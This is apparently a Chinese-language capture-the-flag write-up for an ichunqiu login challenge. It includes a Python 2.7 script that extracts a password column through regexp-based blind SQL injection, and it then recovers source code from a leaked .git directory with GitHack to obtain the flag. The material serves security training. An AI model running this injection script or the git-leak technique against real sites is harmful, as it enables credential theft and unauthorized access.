• 進(jìn)入頁(yè)面登陸
• 輸入東西都沒(méi)有

• 直接給burpsuite看看

  
  
  圖片.png
• 有個(gè)盲注,此處測(cè)試mid left都不行，只有regexp行
• 用腳本進(jìn)行盲注

# py2.7
import string
import requests


u =  'http://c6065149f0634125968c0ed3421e96e17e45f13aa4af4331.changame.ichunqiu.com/Challenges/login.php'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

payloads = string.letters + string.digits

temp = ''

for i in xrange(32):
    for p in payloads:
        payload = temp + p
        data = "username=aa'or p3ss_w0rd regexp '^{}'%23&password=admin".format(payload)
        r = requests.post(u,headers=headers,data=data)
        if(len(r.text.encode('utf-8')) == 12):
                temp += p
                print temp.ljust(32,'.')
                break

• p3ss_w0rd是剛開(kāi)始頁(yè)面里面源碼弄的，什么思路我也不懂。。
• 得到賬號(hào)是bctf3dm1n，密碼是個(gè)md5，解密要收費(fèi)，是adminqwe123666
• 然后登陸進(jìn)去后給出個(gè)目錄列表
• 仔細(xì)看那個(gè)名字.bctfg1t，應(yīng)該是bctf的git。git泄露哦
• 用githack，不是老版的githack，而是https://github.com/BugScanTeam/GitHack，能找到歷史版本
• 運(yùn)行得到git目錄。然后進(jìn)去git cat-file -p HEAD（歷史紀(jì)錄），例如
  git cat -file - p a1/7d89c6219a1bcca6cb3b40526cc5b9da715a6e 去掉/號(hào)
• 多試試可以得到一個(gè)php目錄，然后訪問(wèn)得到flag。